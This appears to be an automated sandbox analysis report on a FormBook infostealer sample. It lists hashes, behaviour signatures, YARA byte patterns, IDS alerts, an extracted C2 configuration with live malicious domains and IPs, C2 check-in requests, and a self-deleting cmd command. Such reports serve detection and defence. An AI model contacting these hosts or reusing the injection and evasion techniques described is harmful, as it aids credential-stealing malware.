
Windows Analysis Report
janacourse2.1.exe

Overview

General Information

Sample name: janacourse2.1.exe
Analysis ID: 1586586
MD5: 9746b0e34b3a2048074caf932a112cc1
SHA1: 340bca56d23ea75d9e3e8e1e15b9a9bf8b051ef8
SHA256: 346d6afdb252d251ce95155e05789adf73f55994f94687286dc4a0fa95327090
Tags: exe, infostealer, malware, trojan, user-Joker

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Found API chain indicative of sandbox detection
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • janacourse2.1.exe (PID: 7340 cmdline: "C:\Users\user\Desktop\janacourse2.1.exe" MD5: 9746B0E34B3A2048074CAF932A112CC1)
    • svchost.exe (PID: 7356 cmdline: "C:\Users\user\Desktop\janacourse2.1.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • explorer.exe (PID: 7428 cmdline: "C:\Windows\SysWOW64\explorer.exe" MD5: DD6597597673F72E10C9DE7901FBA0A8)
          • cmd.exe (PID: 7456 cmdline: /c del "C:\Windows\SysWOW64\svchost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 list": ["www.7b5846.online/hwu6/"], "decoy": ["lf758.vip", "locerin-hair.shop", "vytech.net", "pet-insurance-intl-7990489.live", "thepolithat.buzz", "d66dr114gl.bond", "suv-deals-49508.bond", "job-offer-53922.bond", "drstone1.click", "lebahsemesta57.click", "olmanihousel.shop", "piedmontcsb.info", "trisula888x.top", "66sodovna.net", "dental-implants-83810.bond", "imxtld.club", "frozenpines.net", "ffgzgbl.xyz", "tlc7z.rest", "alexismuller.design", "6vay.boats", "moocatinght.top", "hafwje.bond", "edmaker.online", "simo1simo001.click", "vbsdconsultant.click", "ux-design-courses-53497.bond", "victory88-pay.xyz", "suarahati7.xyz", "otzen.info", "hair-transplantation-65829.bond", "gequiltdesins.shop", "inefity.cloud", "jeeinsight.online", "86339.xyz", "stairr-lift-find.today", "wdgb20.top", "91uvq.pro", "energyecosystem.app", "8e5lr5i9zu.buzz", "migraine-treatment-36101.bond", "eternityzon.shop", "43mjqdyetv.sbs", "healthcare-software-74448.bond", "bethlark.top", "dangdut4dselalu.pro", "04506.club", "rider.vision", "health-insurance-cake.world", "apoppynote.com", "11817e.com", "hiefmotelkeokuk.top", "sugatoken.xyz", "aragamand.business", "alifewithoutlimits.info", "vibrantsoul.xyz", "olarpanels-outlet.info", "ozzd86fih4.online", "skbdicat.xyz", "cloggedpipes.net", "ilsgroup.net", "ptcnl.info", "backstretch.store", "maheshg.xyz"]}
Source | Rule | Description | Author | Strings
00000001.00000002.1707516393.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000001.00000002.1707516393.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
      00000001.00000002.1707516393.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000001.00000002.1707516393.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000001.00000002.1707516393.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
      • 0x18819:$sqlite3step: 68 34 1C 7B E1
      • 0x1892c:$sqlite3step: 68 34 1C 7B E1
      • 0x18848:$sqlite3text: 68 38 2A 90 C5
      • 0x1896d:$sqlite3text: 68 38 2A 90 C5
      • 0x1885b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18983:$sqlite3blob: 68 53 D8 7F 8C
      Source | Rule | Description | Author | Strings
      1.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        1.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
          1.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bd90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          1.2.svchost.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1aaf7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bafa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          1.2.svchost.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
          • 0x17a19:$sqlite3step: 68 34 1C 7B E1
          • 0x17b2c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a48:$sqlite3text: 68 38 2A 90 C5
          • 0x17b6d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a5b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17b83:$sqlite3blob: 68 53 D8 7F 8C

          System Summary

          Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\janacourse2.1.exe", CommandLine: "C:\Users\user\Desktop\janacourse2.1.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\janacourse2.1.exe", ParentImage: C:\Users\user\Desktop\janacourse2.1.exe, ParentProcessId: 7340, ParentProcessName: janacourse2.1.exe, ProcessCommandLine: "C:\Users\user\Desktop\janacourse2.1.exe", ProcessId: 7356, ProcessName: svchost.exe
          Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\janacourse2.1.exe", CommandLine: "C:\Users\user\Desktop\janacourse2.1.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\janacourse2.1.exe", ParentImage: C:\Users\user\Desktop\janacourse2.1.exe, ParentProcessId: 7340, ParentProcessName: janacourse2.1.exe, ProcessCommandLine: "C:\Users\user\Desktop\janacourse2.1.exe", ProcessId: 7356, ProcessName: svchost.exe
          Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
          2025-01-09T11:09:13.337078+0100 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49827 | 185.53.179.91 | 80 | TCP
          2025-01-09T11:09:54.469634+0100 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50003 | 3.33.130.190 | 80 | TCP


          AV Detection

          Source: http://www.ffgzgbl.xyz/hwu6/ | Avira URL Cloud: Label: malware
          Source: http://www.ffgzgbl.xyz/hwu6/www.suv-deals-49508.bond | Avira URL Cloud: Label: malware
          Source: http://www.ffgzgbl.xyz | Avira URL Cloud: Label: malware
          Source: 00000001.00000002.1707516393.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.7b5846.online/hwu6/"], "decoy": ["lf758.vip", "locerin-hair.shop", "vytech.net", "pet-insurance-intl-7990489.live", "thepolithat.buzz", "d66dr114gl.bond", "suv-deals-49508.bond", "job-offer-53922.bond", "drstone1.click", "lebahsemesta57.click", "olmanihousel.shop", "piedmontcsb.info", "trisula888x.top", "66sodovna.net", "dental-implants-83810.bond", "imxtld.club", "frozenpines.net", "ffgzgbl.xyz", "tlc7z.rest", "alexismuller.design", "6vay.boats", "moocatinght.top", "hafwje.bond", "edmaker.online", "simo1simo001.click", "vbsdconsultant.click", "ux-design-courses-53497.bond", "victory88-pay.xyz", "suarahati7.xyz", "otzen.info", "hair-transplantation-65829.bond", "gequiltdesins.shop", "inefity.cloud", "jeeinsight.online", "86339.xyz", "stairr-lift-find.today", "wdgb20.top", "91uvq.pro", "energyecosystem.app", "8e5lr5i9zu.buzz", "migraine-treatment-36101.bond", "eternityzon.shop", "43mjqdyetv.sbs", "healthcare-software-74448.bond", "bethlark.top", "dangdut4dselalu.pro", "04506.club", "rider.vision", "health-insurance-cake.world", "apoppynote.com", "11817e.com", "hiefmotelkeokuk.top", "sugatoken.xyz", "aragamand.business", "alifewithoutlimits.info", "vibrantsoul.xyz", "olarpanels-outlet.info", "ozzd86fih4.online", "skbdicat.xyz", "cloggedpipes.net", "ilsgroup.net", "ptcnl.info", "backstretch.store", "maheshg.xyz"]}
          Source: janacourse2.1.exe | Virustotal: Detection: 31%
          Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.janacourse2.1.exe.1df0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.janacourse2.1.exe.1df0000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000001.00000002.1707516393.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.2894349605.0000000004840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.1707952623.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.1653240375.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.1707975652.0000000003270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.2894297135.0000000004810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.2893815730.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
          Source: janacourse2.1.exe | Joe Sandbox ML: detected
          Source: janacourse2.1.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: Binary string: explorer.pdbUGP source: svchost.exe, 00000001.00000003.1706279740.0000000005400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1706921382.0000000005900000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2892144849.0000000000480000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: janacourse2.1.exe, 00000000.00000003.1649968191.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, janacourse2.1.exe, 00000000.00000003.1650076305.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1651592410.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1653270272.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1708032120.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1708032120.0000000003400000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1709728858.00000000048FF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2894614878.0000000004AB0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2894614878.0000000004C4E000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1708153894.0000000004713000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: janacourse2.1.exe, 00000000.00000003.1649968191.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, janacourse2.1.exe, 00000000.00000003.1650076305.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1651592410.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1653270272.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1708032120.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1708032120.0000000003400000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, explorer.exe, 00000003.00000003.1709728858.00000000048FF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2894614878.0000000004AB0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2894614878.0000000004C4E000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1708153894.0000000004713000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: explorer.pdb source: svchost.exe, 00000001.00000003.1706279740.0000000005400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1706921382.0000000005900000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2892144849.0000000000480000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdb source: explorer.exe, 00000002.00000002.2903104637.0000000010F9F000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.2893942362.0000000002D6C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2895259172.0000000004FFF000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000002.00000002.2903104637.0000000010F9F000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.2893942362.0000000002D6C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2895259172.0000000004FFF000.00000004.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\janacourse2.1.exe | Code function: 0_2_0102698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_0102698F
          Source: C:\Users\user\Desktop\janacourse2.1.exe | Code function: 0_2_010268EE FindFirstFileW,FindClose, 0_2_010268EE
          Source: C:\Users\user\Desktop\janacourse2.1.exe | Code function: 0_2_0101D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0101D076
          Source: C:\Users\user\Desktop\janacourse2.1.exe | Code function: 0_2_0101D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0101D3A9
          Source: C:\Users\user\Desktop\janacourse2.1.exe | Code function: 0_2_0102979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0102979D
          Source: C:\Users\user\Desktop\janacourse2.1.exe | Code function: 0_2_01029642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_01029642
          Source: C:\Users\user\Desktop\janacourse2.1.exe | Code function: 0_2_01029B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_01029B2B
          Source: C:\Users\user\Desktop\janacourse2.1.exe | Code function: 0_2_0101DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_0101DBBE
          Source: C:\Users\user\Desktop\janacourse2.1.exe | Code function: 0_2_01025C97 FindFirstFileW,FindNextFileW,FindClose, 0_2_01025C97
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4x nop then pop edi 1_2_00417D7F
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 4x nop then pop edi 3_2_029E7D7F

          Networking

          Source: Network traffic | Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49827 -> 185.53.179.91:80
          Source: Network traffic | Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49827 -> 185.53.179.91:80
          Source: Network traffic | Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49827 -> 185.53.179.91:80
          Source: Network traffic | Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:50003 -> 3.33.130.190:80
          Source: Network traffic | Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:50003 -> 3.33.130.190:80
          Source: Network traffic | Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:50003 -> 3.33.130.190:80
          Source: C:\Windows\explorer.exe | Network Connect: 185.53.179.91 80
          Source: C:\Windows\explorer.exe | Network Connect: 3.33.130.190 80
          Source: Malware configuration extractor | URLs: www.7b5846.online/hwu6/
          Source: DNS query: www.ffgzgbl.xyz
          Source: global traffic | HTTP traffic detected: GET /hwu6/?p0D=AfhLzLu&Dzr4T=CMKgcc8wmxxR7fJItHbMJ/VlsopyIdLojC2P8mirEdBvwXB60poQ/q0A3kD4/g2OcT4A HTTP/1.1 | Host: www.suv-deals-49508.bond | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /hwu6/?p0D=AfhLzLu&Dzr4T=WtJoisMWybjm7VngE64Vj/DeRFLELHs11aJdAXokC53izMeFLFxWUjGDd6P63up6AapE HTTP/1.1 | Host: www.energyecosystem.app | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: Joe Sandbox View | IP Address: 185.53.179.91 185.53.179.91
          Source: Joe Sandbox View | IP Address: 3.33.130.190 3.33.130.190
          Source: Joe Sandbox View | ASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE
          Source: Joe Sandbox View | ASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB
          Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\Desktop\janacourse2.1.exe | Code function: 0_2_0102CF1A InternetQueryDataAvailable,InternetReadFile,GetLastError,SetEvent,SetEvent, 0_2_0102CF1A
          Source: global traffic | HTTP traffic detected: GET /hwu6/?p0D=AfhLzLu&Dzr4T=CMKgcc8wmxxR7fJItHbMJ/VlsopyIdLojC2P8mirEdBvwXB60poQ/q0A3kD4/g2OcT4A HTTP/1.1 | Host: www.suv-deals-49508.bond | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /hwu6/?p0D=AfhLzLu&Dzr4T=WtJoisMWybjm7VngE64Vj/DeRFLELHs11aJdAXokC53izMeFLFxWUjGDd6P63up6AapE HTTP/1.1 | Host: www.energyecosystem.app | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | DNS traffic detected: DNS query: www.6vay.boats
          Source: global traffic | DNS traffic detected: DNS query: www.ffgzgbl.xyz
          Source: global traffic | DNS traffic detected: DNS query: www.suv-deals-49508.bond
          Source: global traffic | DNS traffic detected: DNS query: www.imxtld.club
          Source: global traffic | DNS traffic detected: DNS query: www.energyecosystem.app
          Source: explorer.exe, 00000002.00000002.2898200264.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1658360423.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1664931071.000000000982D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: explorer.exe, 00000002.00000002.2898200264.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1658360423.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1664931071.000000000982D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000002.00000002.2898200264.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1658360423.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1664931071.000000000982D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: explorer.exe, 00000002.00000002.2898200264.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1658360423.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1664931071.000000000982D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000002.00000002.2896132549.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1658360423.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: explorer.exe, 00000002.00000002.2898200264.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1664931071.000000000982D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.mi
          Source: explorer.exe, 00000002.00000002.2898200264.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1664931071.000000000982D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.micr
          Source: explorer.exe, 00000002.00000002.2897659949.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.2899099491.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1660354222.0000000007F40000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.6vay.boats
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.6vay.boats/hwu6/
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.6vay.boats/hwu6/www.ffgzgbl.xyz
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.6vay.boatsReferer:
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.7b5846.online
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.7b5846.online/hwu6/
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.7b5846.online/hwu6/www.suarahati7.xyz
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.7b5846.onlineReferer:
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.apoppynote.com
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.apoppynote.com/hwu6/
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.apoppynote.com/hwu6/www.victory88-pay.xyz
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.apoppynote.comReferer:
          Source: explorer.exe, 00000002.00000000.1658360423.00000000079B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.00000000079B1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.bethlark.top
